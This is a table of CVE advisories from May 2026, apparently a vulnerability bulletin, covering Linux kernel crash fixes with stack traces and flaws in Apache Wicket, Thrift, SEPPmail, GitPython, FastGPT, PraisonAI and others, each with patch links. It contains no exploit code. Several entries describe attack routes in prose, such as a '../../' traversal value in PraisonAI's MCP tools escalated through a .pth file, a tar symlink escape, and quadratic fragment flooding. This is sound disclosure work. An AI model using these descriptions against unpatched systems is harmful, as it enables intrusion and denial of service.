| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix crash when moving to switchdev mode When moving to switchdev mode when the device doesn't support IPsec, we try to clean up the IPsec resources anyway which causes the crash below, fix that by correctly checking for IPsec support before trying to clean up its resources. [27642.515799] WARNING: arch/x86/mm/fault.c:1276 at do_user_addr_fault+0x18a/0x680, CPU#4: devlink/6490 [27642.517159] Modules linked in: xt_conntrack xt_MASQUERADE ip6table_nat ip6table_filter ip6_tables iptable_nat nf_nat xt_addrtype rpcsec_gss_krb5 auth_rpcgss oid_registry overlay mlx5_fwctl nfnetlink zram zsmalloc mlx5_ib fuse rpcrdma rdma_ucm ib_uverbs ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm mlx5_core ib_core [27642.521358] CPU: 4 UID: 0 PID: 6490 Comm: devlink Not tainted 6.19.0-rc5_for_upstream_min_debug_2026_01_14_16_47 #1 NONE [27642.522923] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [27642.524528] RIP: 0010:do_user_addr_fault+0x18a/0x680 [27642.525362] Code: ff 0f 84 75 03 00 00 48 89 ee 4c 89 e7 e8 5e b9 22 00 49 89 c0 48 85 c0 0f 84 a8 02 00 00 f7 c3 60 80 00 00 74 22 31 c9 eb ae <0f> 0b 48 83 c4 10 48 89 ea 48 89 de 4c 89 f7 5b 5d 41 5c 41 5d 41 [27642.528166] RSP: 0018:ffff88810770f6b8 EFLAGS: 00010046 [27642.529038] RAX: 0000000000000000 RBX: 0000000000000002 RCX: ffff88810b980f00 [27642.530158] RDX: 00000000000000a0 RSI: 0000000000000002 RDI: ffff88810770f728 [27642.531270] RBP: 00000000000000a0 R08: 0000000000000000 R09: 0000000000000000 [27642.532383] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888103f3c4c0 [27642.533499] R13: 0000000000000000 R14: ffff88810770f728 R15: 0000000000000000 [27642.534614] FS: 00007f197c741740(0000) GS:ffff88856a94c000(0000) knlGS:0000000000000000 [27642.535915] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [27642.536858] CR2: 00000000000000a0 CR3: 000000011334c003 CR4: 0000000000172eb0 [27642.537982] Call Trace: [27642.538466] <TASK> [27642.538907] exc_page_fault+0x76/0x140 [27642.539583] asm_exc_page_fault+0x22/0x30 [27642.540282] RIP: 0010:_raw_spin_lock_irqsave+0x10/0x30 [27642.541134] Code: 07 85 c0 75 11 ba ff 00 00 00 f0 0f b1 17 75 06 b8 01 00 00 00 c3 31 c0 c3 90 0f 1f 44 00 00 53 9c 5b fa 31 c0 ba 01 00 00 00 <f0> 0f b1 17 75 05 48 89 d8 5b c3 89 c6 e8 7e 02 00 00 48 89 d8 5b [27642.543936] RSP: 0018:ffff88810770f7d8 EFLAGS: 00010046 [27642.544803] RAX: 0000000000000000 RBX: 0000000000000202 RCX: ffff888113ad96d8 [27642.545916] RDX: 0000000000000001 RSI: ffff88810770f818 RDI: 00000000000000a0 [27642.547027] RBP: 0000000000000098 R08: 0000000000000400 R09: ffff88810b980f00 [27642.548140] R10: 0000000000000001 R11: ffff888101845a80 R12: 00000000000000a8 [27642.549263] R13: ffffffffa02a9060 R14: 00000000000000a0 R15: ffff8881130d8a40 [27642.550379] complete_all+0x20/0x90 [27642.551010] mlx5e_ipsec_disable_events+0xb6/0xf0 [mlx5_core] [27642.552022] mlx5e_nic_disable+0x12d/0x220 [mlx5_core] [27642.552929] mlx5e_detach_netdev+0x66/0xf0 [mlx5_core] [27642.553822] mlx5e_netdev_change_profile+0x5b/0x120 [mlx5_core] [27642.554821] mlx5e_vport_rep_load+0x419/0x590 [mlx5_core] [27642.555757] ? xa_load+0x53/0x90 [27642.556361] __esw_offloads_load_rep+0x54/0x70 [mlx5_core] [27642.557328] mlx5_esw_offloads_rep_load+0x45/0xd0 [mlx5_core] [27642.558320] esw_offloads_enable+0xb4b/0xc90 [mlx5_core] [27642.559247] mlx5_eswitch_enable_locked+0x34e/0x4f0 [mlx5_core] [27642.560257] ? mlx5_rescan_drivers_locked+0x222/0x2d0 [mlx5_core] [27642.561284] mlx5_devlink_eswitch_mode_set+0x5ac/0x9c0 [mlx5_core] [27642.562334] ? devlink_rate_set_ops_supported+0x21/0x3a0 [27642.563220] devlink_nl_eswitch_set_doit+0x67/0xe0 [27642.564026] genl_family_rcv_msg_doit+0xe0/0x130 [27642.564816] genl_rcv_msg+0x183/0x290 [27642.565466] ? __devlink_nl_pre_doit.isra.0+0x160/0x160 [27642.566329] ? d ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43467 | https://git.kernel.org/stable/c/05c9a6df3646cdd25e0e10e6ef2d20cdba3ed8f9 https://git.kernel.org/stable/c/835778685f157b4fd4683b670cfe4010265bac60 https://git.kernel.org/stable/c/bc72f739f398d9d2e4f3d06f3f75fe98876d5579 https://git.kernel.org/stable/c/24b2795f9683e092dc22a68f487e7aaaf2ddafea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix deadlock between devlink lock and esw->wq esw->work_queue executes esw_functions_changed_event_handler -> esw_vfs_changed_event_handler and acquires the devlink lock. .eswitch_mode_set (acquires devlink lock in devlink_nl_pre_doit) -> mlx5_devlink_eswitch_mode_set -> mlx5_eswitch_disable_locked -> mlx5_eswitch_event_handler_unregister -> flush_workqueue deadlocks when esw_vfs_changed_event_handler executes. Fix that by no longer flushing the work to avoid the deadlock, and using a generation counter to keep track of work relevance. This avoids an old handler manipulating an esw that has undergone one or more mode changes: - the counter is incremented in mlx5_eswitch_event_handler_unregister. - the counter is read and passed to the ephemeral mlx5_host_work struct. - the work handler takes the devlink lock and bails out if the current generation is different than the one it was scheduled to operate on. - mlx5_eswitch_cleanup does the final draining before destroying the wq. No longer flushing the workqueue has the side effect of maybe no longer cancelling pending vport_change_handler work items, but that's ok since those are disabled elsewhere: - mlx5_eswitch_disable_locked disables the vport eq notifier. - mlx5_esw_vport_disable disarms the HW EQ notification and marks vport->enabled under state_lock to false to prevent pending vport handler from doing anything. - mlx5_eswitch_cleanup destroys the workqueue and makes sure all events are disabled/finished. | 2026-05-08 | not yet calculated | CVE-2026-43468 | https://git.kernel.org/stable/c/0de867f6e34eae6907b367fd152c55e61cb98608 https://git.kernel.org/stable/c/957d2a58f7f8ebcbdd0a85935e0d2675134b890d https://git.kernel.org/stable/c/3c7313cb41b1b427078440364d2f042c276a1c0b https://git.kernel.org/stable/c/4a7838bebc38374f74baaf88bf2cf8d439a92923 https://git.kernel.org/stable/c/90e7e5d14d0bd25ffd019a3aa39d9f1c05fedbe1 https://git.kernel.org/stable/c/aed763abf0e905b4b8d747d1ba9e172961572f57 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfs: return EISDIR on nfs3_proc_create if d_alias is a dir If we found an alias through nfs3_do_create/nfs_add_or_obtain /d_splice_alias which happens to be a dir dentry, we don't return any error, and simply forget about this alias, but the original dentry we were adding and passed as parameter remains negative. This later causes an oops on nfs_atomic_open_v23/finish_open since we supply a negative dentry to do_dentry_open. This has been observed running lustre-racer, where dirs and files are created/removed concurrently with the same name and O_EXCL is not used to open files (frequent file redirection). While d_splice_alias typically returns a directory alias or NULL, we explicitly check d_is_dir() to ensure that we don't attempt to perform file operations (like finish_open) on a directory inode, which triggers the observed oops. | 2026-05-08 | not yet calculated | CVE-2026-43470 | https://git.kernel.org/stable/c/7e2963773760a664684435201960dd2fb712f1b5 https://git.kernel.org/stable/c/203c792cb4315360d49973ae2e57feeb6d3dcf7e https://git.kernel.org/stable/c/9ee1770fcb2f1b48354622b926e7dc10222805f5 https://git.kernel.org/stable/c/410666a298c34ebd57256fde6b24c96bd23059a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix possible NULL pointer dereference in ufshcd_add_command_trace() The kernel log indicates a crash in ufshcd_add_command_trace, due to a NULL pointer dereference when accessing hwq->id. This can happen if ufshcd_mcq_req_to_hwq() returns NULL. This patch adds a NULL check for hwq before accessing its id field to prevent a kernel crash. Kernel log excerpt: [<ffffffd5d192dc4c>] notify_die+0x4c/0x8c [<ffffffd5d1814e58>] __die+0x60/0xb0 [<ffffffd5d1814d64>] die+0x4c/0xe0 [<ffffffd5d181575c>] die_kernel_fault+0x74/0x88 [<ffffffd5d1864db4>] __do_kernel_fault+0x314/0x318 [<ffffffd5d2a3cdf8>] do_page_fault+0xa4/0x5f8 [<ffffffd5d2a3cd34>] do_translation_fault+0x34/0x54 [<ffffffd5d1864524>] do_mem_abort+0x50/0xa8 [<ffffffd5d2a297dc>] el1_abort+0x3c/0x64 [<ffffffd5d2a29718>] el1h_64_sync_handler+0x44/0xcc [<ffffffd5d181133c>] el1h_64_sync+0x80/0x88 [<ffffffd5d255c1dc>] ufshcd_add_command_trace+0x23c/0x320 [<ffffffd5d255bad8>] ufshcd_compl_one_cqe+0xa4/0x404 [<ffffffd5d2572968>] ufshcd_mcq_poll_cqe_lock+0xac/0x104 [<ffffffd5d11c7460>] ufs_mtk_mcq_intr+0x54/0x74 [ufs_mediatek_mod] [<ffffffd5d19ab92c>] __handle_irq_event_percpu+0xc8/0x348 [<ffffffd5d19abca8>] handle_irq_event+0x3c/0xa8 [<ffffffd5d19b1f0c>] handle_fasteoi_irq+0xf8/0x294 [<ffffffd5d19aa778>] generic_handle_domain_irq+0x54/0x80 [<ffffffd5d18102bc>] gic_handle_irq+0x1d4/0x330 [<ffffffd5d1838210>] call_on_irq_stack+0x44/0x68 [<ffffffd5d183af30>] do_interrupt_handler+0x78/0xd8 [<ffffffd5d2a29c00>] el1_interrupt+0x48/0xa8 [<ffffffd5d2a29ba8>] el1h_64_irq_handler+0x14/0x24 [<ffffffd5d18113c4>] el1h_64_irq+0x80/0x88 [<ffffffd5d2527fb4>] arch_local_irq_enable+0x4/0x1c [<ffffffd5d25282e4>] cpuidle_enter+0x34/0x54 [<ffffffd5d195a678>] do_idle+0x1dc/0x2f8 [<ffffffd5d195a7c4>] cpu_startup_entry+0x30/0x3c [<ffffffd5d18155c4>] secondary_start_kernel+0x134/0x1ac [<ffffffd5d18640bc>] __secondary_switched+0xc4/0xcc | 2026-05-08 | not yet calculated | CVE-2026-43471 | https://git.kernel.org/stable/c/0614f5618c24fbc3d555efade22887b102ad7ad6 https://git.kernel.org/stable/c/be730f9ee92ae08f2bc4b336967bcfd8183c06fe https://git.kernel.org/stable/c/f4f590c6c9df7453bbda2ef9170b1b09e42a124c https://git.kernel.org/stable/c/93b9e7ee9e93629db80bbc9dab8a874215b89ccf https://git.kernel.org/stable/c/30df81f2228d65bddf492db3929d9fcaffd38fc5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: unshare: fix unshare_fs() handling There's an unpleasant corner case in unshare(2), when we have a CLONE_NEWNS in flags and current->fs hadn't been shared at all; in that case copy_mnt_ns() gets passed current->fs instead of a private copy, which causes interesting warts in proof of correctness] > I guess if private means fs->users == 1, the condition could still be true. Unfortunately, it's worse than just a convoluted proof of correctness. Consider the case when we have CLONE_NEWCGROUP in addition to CLONE_NEWNS (and current->fs->users == 1). We pass current->fs to copy_mnt_ns(), all right. Suppose it succeeds and flips current->fs->{pwd,root} to corresponding locations in the new namespace. Now we proceed to copy_cgroup_ns(), which fails (e.g. with -ENOMEM). We call put_mnt_ns() on the namespace created by copy_mnt_ns(), it's destroyed and its mount tree is dissolved, but... current->fs->root and current->fs->pwd are both left pointing to now detached mounts. They are pinning those, so it's not a UAF, but it leaves the calling process with unshare(2) failing with -ENOMEM _and_ leaving it with pwd and root on detached isolated mounts. The last part is clearly a bug. There is other fun related to that mess (races with pivot_root(), including the one between pivot_root() and fork(), of all things), but this one is easy to isolate and fix - treat CLONE_NEWNS as "allocate a new fs_struct even if it hadn't been shared in the first place". Sure, we could go for something like "if both CLONE_NEWNS *and* one of the things that might end up failing after copy_mnt_ns() call in create_new_namespaces() are set, force allocation of new fs_struct", but let's keep it simple - the cost of copy_fs_struct() is trivial. Another benefit is that copy_mnt_ns() with CLONE_NEWNS *always* gets a freshly allocated fs_struct, yet to be attached to anything. That seriously simplifies the analysis... FWIW, that bug had been there since the introduction of unshare(2) ;-/ | 2026-05-08 | not yet calculated | CVE-2026-43472 | https://git.kernel.org/stable/c/845bf3c6963a52096d0d3866e4a92db77a0c03d8 https://git.kernel.org/stable/c/d3ffc8f13034af895531a02c30b1fe3a34b46432 https://git.kernel.org/stable/c/d0d99f60538ddb4a62ccaac2168d8f448965f083 https://git.kernel.org/stable/c/d7963d6997fea86a6def242ac36198b86655f912 https://git.kernel.org/stable/c/aa9ebc084505fb26dd90f4d7a249045aad152043 https://git.kernel.org/stable/c/af8f4be3b68ac8caa41c8e5ead0eeaf5e85e42d0 https://git.kernel.org/stable/c/42e21e74061b0ebbd859839f81acf10efad02a27 https://git.kernel.org/stable/c/6c4b2243cb6c0755159bd567130d5e12e7b10d9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Add NULL checks when resetting request and reply queues The driver encountered a crash during resource cleanup when the reply and request queues were NULL due to freed memory. This issue occurred when the creation of reply or request queues failed, and the driver freed the memory first, but then attempted to memset the content of the freed memory, leading to a system crash. Add NULL pointer checks for reply and request queues before accessing the reply/request memory during cleanup. | 2026-05-08 | not yet calculated | CVE-2026-43473 | https://git.kernel.org/stable/c/7df0296ad4e9253d12c6dbe7f120044dddc95600 https://git.kernel.org/stable/c/7da755e0d02e9ca035065127e108d1fed8950dc8 https://git.kernel.org/stable/c/78d3f201f8b609928eade53cf03a52df5415aaf7 https://git.kernel.org/stable/c/e978a36f332ede78eb4de037b517db16265d420d https://git.kernel.org/stable/c/220d7ca70611a73d50ef8e9edac630ed1ececb7c https://git.kernel.org/stable/c/fa96392ebebc8fade2b878acb14cce0f71016503 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: init flags_valid before calling vfs_fileattr_get syzbot reported an uninit-value bug in [1]. Similar to the "*get" context where the kernel's internal file_kattr structure is initialized before calling vfs_fileattr_get(), we should use the same mechanism when using fa. [1] BUG: KMSAN: uninit-value in fuse_fileattr_get+0xeb4/0x1450 fs/fuse/ioctl.c:517 fuse_fileattr_get+0xeb4/0x1450 fs/fuse/ioctl.c:517 vfs_fileattr_get fs/file_attr.c:94 [inline] __do_sys_file_getattr fs/file_attr.c:416 [inline] Local variable fa.i created at: __do_sys_file_getattr fs/file_attr.c:380 [inline] __se_sys_file_getattr+0x8c/0xbd0 fs/file_attr.c:372 | 2026-05-08 | not yet calculated | CVE-2026-43474 | https://git.kernel.org/stable/c/379e19e820dd1c6145426b97467728b3b89c0b42 https://git.kernel.org/stable/c/b8c182b2c8c44c6016b11d8af61715ad7ef958a1 https://git.kernel.org/stable/c/cb184dd19154fc486fa3d9e02afe70a97e54e055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: storvsc: Fix scheduling while atomic on PREEMPT_RT This resolves the following splat and lock-up when running with PREEMPT_RT enabled on Hyper-V: [ 415.140818] BUG: scheduling while atomic: stress-ng-iomix/1048/0x00000002 [ 415.140822] INFO: lockdep is turned off. [ 415.140823] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec ghash_clmulni_intel aesni_intel rapl binfmt_misc nls_ascii nls_cp437 vfat fat snd_pcm hyperv_drm snd_timer drm_client_lib drm_shmem_helper snd sg soundcore drm_kms_helper pcspkr hv_balloon hv_utils evdev joydev drm configfs efi_pstore nfnetlink vsock_loopback vmw_vsock_virtio_transport_common hv_sock vmw_vsock_vmci_transport vsock vmw_vmci efivarfs autofs4 ext4 crc16 mbcache jbd2 sr_mod sd_mod cdrom hv_storvsc serio_raw hid_generic scsi_transport_fc hid_hyperv scsi_mod hid hv_netvsc hyperv_keyboard scsi_common [ 415.140846] Preemption disabled at: [ 415.140847] [<ffffffffc0656171>] storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140854] CPU: 8 UID: 0 PID: 1048 Comm: stress-ng-iomix Not tainted 6.19.0-rc7 #30 PREEMPT_{RT,(full)} [ 415.140856] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/04/2024 [ 415.140857] Call Trace: [ 415.140861] <TASK> [ 415.140861] ? storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140863] dump_stack_lvl+0x91/0xb0 [ 415.140870] __schedule_bug+0x9c/0xc0 [ 415.140875] __schedule+0xdf6/0x1300 [ 415.140877] ? rtlock_slowlock_locked+0x56c/0x1980 [ 415.140879] ? rcu_is_watching+0x12/0x60 [ 415.140883] schedule_rtlock+0x21/0x40 [ 415.140885] rtlock_slowlock_locked+0x502/0x1980 [ 415.140891] rt_spin_lock+0x89/0x1e0 [ 415.140893] hv_ringbuffer_write+0x87/0x2a0 [ 415.140899] vmbus_sendpacket_mpb_desc+0xb6/0xe0 [ 415.140900] ? rcu_is_watching+0x12/0x60 [ 415.140902] storvsc_queuecommand+0x669/0xbe0 [hv_storvsc] [ 415.140904] ? HARDIRQ_verbose+0x10/0x10 [ 415.140908] ? __rq_qos_issue+0x28/0x40 [ 415.140911] scsi_queue_rq+0x760/0xd80 [scsi_mod] [ 415.140926] __blk_mq_issue_directly+0x4a/0xc0 [ 415.140928] blk_mq_issue_direct+0x87/0x2b0 [ 415.140931] blk_mq_dispatch_queue_requests+0x120/0x440 [ 415.140933] blk_mq_flush_plug_list+0x7a/0x1a0 [ 415.140935] __blk_flush_plug+0xf4/0x150 [ 415.140940] __submit_bio+0x2b2/0x5c0 [ 415.140944] ? submit_bio_noacct_nocheck+0x272/0x360 [ 415.140946] submit_bio_noacct_nocheck+0x272/0x360 [ 415.140951] ext4_read_bh_lock+0x3e/0x60 [ext4] [ 415.140995] ext4_block_write_begin+0x396/0x650 [ext4] [ 415.141018] ? __pfx_ext4_da_get_block_prep+0x10/0x10 [ext4] [ 415.141038] ext4_da_write_begin+0x1c4/0x350 [ext4] [ 415.141060] generic_perform_write+0x14e/0x2c0 [ 415.141065] ext4_buffered_write_iter+0x6b/0x120 [ext4] [ 415.141083] vfs_write+0x2ca/0x570 [ 415.141087] ksys_write+0x76/0xf0 [ 415.141089] do_syscall_64+0x99/0x1490 [ 415.141093] ? rcu_is_watching+0x12/0x60 [ 415.141095] ? finish_task_switch.isra.0+0xdf/0x3d0 [ 415.141097] ? rcu_is_watching+0x12/0x60 [ 415.141098] ? lock_release+0x1f0/0x2a0 [ 415.141100] ? rcu_is_watching+0x12/0x60 [ 415.141101] ? finish_task_switch.isra.0+0xe4/0x3d0 [ 415.141103] ? rcu_is_watching+0x12/0x60 [ 415.141104] ? __schedule+0xb34/0x1300 [ 415.141106] ? hrtimer_try_to_cancel+0x1d/0x170 [ 415.141109] ? do_nanosleep+0x8b/0x160 [ 415.141111] ? hrtimer_nanosleep+0x89/0x100 [ 415.141114] ? __pfx_hrtimer_wakeup+0x10/0x10 [ 415.141116] ? xfd_validate_state+0x26/0x90 [ 415.141118] ? rcu_is_watching+0x12/0x60 [ 415.141120] ? do_syscall_64+0x1e0/0x1490 [ 415.141121] ? do_syscall_64+0x1e0/0x1490 [ 415.141123] ? rcu_is_watching+0x12/0x60 [ 415.141124] ? do_syscall_64+0x1e0/0x1490 [ 415.141125] ? do_syscall_64+0x1e0/0x1490 [ 415.141127] ? irqentry_exit+0x140/0 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43475 | https://git.kernel.org/stable/c/cf00cb15f2515e38d3b7571bf6800b7c6ce70a84 https://git.kernel.org/stable/c/b82462af23e45e066dd56d2736ea70159a6ad647 https://git.kernel.org/stable/c/91ab59f76d0866079420ebff1c7959fcd87a242e https://git.kernel.org/stable/c/e7919a293f9b6101e38bde0d8613daea6c9955df https://git.kernel.org/stable/c/f8db760f4f52a73a022a3d6c84c488ead952a9b5 https://git.kernel.org/stable/c/c2e73d8acd056347a70047e6be7cd98e0e811dfa https://git.kernel.org/stable/c/c7984d196476adcbd51c0ce386d7e90277198d57 https://git.kernel.org/stable/c/57297736c08233987e5d29ce6584c6ca2a831b12 |
| Apache Software Foundation--Apache Wicket | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-43646 | https://lists.apache.org/thread/6zqcvjyz4lsqty1z2g5hg7pl5fqk88rs |
| Apache Software Foundation--Apache Thrift | Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43868 | https://lists.apache.org/thread/zj76dtwnbbs1m7z3focf4wd51pqpsmn9 |
| Apache Software Foundation--Apache Thrift | Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43869 | https://lists.apache.org/thread/3hsgl1b69wzq3ry39scqbv2dhyl3j52r |
| Apache Software Foundation--Apache Thrift | Origin Validation Error, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting'), Uncontrolled Resource Consumption vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43870 | https://lists.apache.org/thread/pgtfq44ltc9t63kxcbqmwqzt45pnhqdy |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. From versions 3.0.6 to before 3.8.15, electerm is vulnerable to arbitrary local code execution via deep links, CLI --opts, or crafted shortcuts. Exploit requires clicking a crafted electerm://... link or opening a crafted shortcut/command that launches electerm with attacker-controlled opts. This issue has been patched in version 3.8.15. | 2026-05-08 | not yet calculated | CVE-2026-43944 | https://github.com/electerm/electerm/security/advisories/GHSA-mpm8-cx2p-626q https://github.com/electerm/electerm/commit/8a6a17951e96d715f5a231532bbd8303fe208700 https://github.com/electerm/electerm/commit/a79e06f4a1f0ac6376c3d2411ef4690fa0377742 https://github.com/electerm/electerm/releases/tag/v3.8.15 |
| absinthe-graphql--absinthe | Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation. 'Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames':run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, &(&1.name == name)) - a full linear scan of the fragment list. The result is O(N²) comparisons per document, where N is the number of fragment definitions supplied by the caller. Because input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 × 10⁹ comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required. This issue affects absinthe: from 1.2.0 before 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-43967 | https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2 https://cna.erlef.org/cves/CVE-2026-43967.html https://osv.dev/vulnerability/EEF-CVE-2026-43967 https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d |
| Apache Software Foundation--Apache Wicket | FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbitrary locations on the server. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-43975 | https://github.com/apache/wicket/pull/1432 https://lists.apache.org/thread/xp2jrdk6ppv1zcmxb4w1mk2lg1dw3hbr |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 fails to enforce authorization checks for multiple endpoints in the new GINA UI, allowing unauthenticated remote attackers to access functionality that should require a valid session. | 2026-05-08 | not yet calculated | CVE-2026-44125 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 insecurely deserializes untrusted data, which can be reached from the new GINA UI and may allow unauthenticated remote attackers to execute code via a crafted serialized object. | 2026-05-08 | not yet calculated | CVE-2026-44126 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 contains an unauthenticated path traversal vulnerability in the identifier parameter of /api.app/attachment/preview that allows remote attackers to read arbitrary local files and trigger deletion of files in the targeted directory with the privileges of the api.app process. | 2026-05-08 | not yet calculated | CVE-2026-44127 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.2.1 allows unauthenticated remote code execution in the new GINA UI because an endpoint passes attacker-controlled input from a parameter to Perl's eval. | 2026-05-08 | not yet calculated | CVE-2026-44128 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 contains a server-side template injection vulnerability in the new GINA UI because an endpoint accepts an attacker-controlled template, allowing remote attackers to execute arbitrary template expressions and potentially achieve remote code execution depending on the enabled template plugins. | 2026-05-08 | not yet calculated | CVE-2026-44129 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository's .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48. | 2026-05-07 | not yet calculated | CVE-2026-44243 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to version 4.14.17, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability allows attackers (or authenticated users with App editing privileges) to send arbitrary HTTP requests to internal/private network addresses. The fetchData function in the lafModule workflow node uses axios to fetch user-controlled URLs without validating them against the application's internal network blocklist guard (isInternalAddress), bypassing SSRF protections. This issue has been patched in version 4.14.17. | 2026-05-08 | not yet calculated | CVE-2026-44286 | https://github.com/labring/FastGPT/security/advisories/GHSA-xpx6-xcpf-76qg https://github.com/labring/FastGPT/releases/tag/v4.14.17 |
| The Document Foundation--LibreOffice | Out-of-bounds write vulnerability in The Document Foundation LibreOffice via crafted OOXML documents with mismatched encryption salt parameters. This issue affects LibreOffice: from 26.2 before 26.2.3, from 25.8 before 25.8.7. | 2026-05-07 | not yet calculated | CVE-2026-4430 | https://www.libreoffice.org/about-us/security/advisories/cve-2026-4430 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 1.6.32, the URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. This issue has been patched in version 1.6.32. | 2026-05-08 | not yet calculated | CVE-2026-44335 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q9pw-vmhh-384g |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.34, PraisonAI's MCP (Model Context Protocol) server (praisonai mcp serve) registers four file-handling tools by default - praisonai.rules.create, praisonai.rules.show, praisonai.rules.delete, and praisonai.workflow.show. Each accepts a path or filename string from MCP tools/call arguments and joins it onto ~/.praison/rules/ (or, for workflow.show, accepts an absolute path) with no containment check. The JSON-RPC dispatcher passes params["arguments"] blind to each handler via **kwargs without validating against the advertised input schema. By setting rule_name="../../<some-path>" an attacker walks out of the rules directory and writes any file the running user can write. Dropping a Python .pth file into the user site-packages directory escalates this primitive to arbitrary code execution in any subsequent Python process the user spawns - the next praisonai CLI invocation, an IDE script run, the user's python REPL, or any background Python service. This issue has been patched in version 4.6.34. | 2026-05-08 | not yet calculated | CVE-2026-44336 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9mqq-jqxf-grvw |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.37, the _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape - but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem. This issue has been patched in version 4.6.37. | 2026-05-08 | not yet calculated | CVE-2026-44340 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3 |
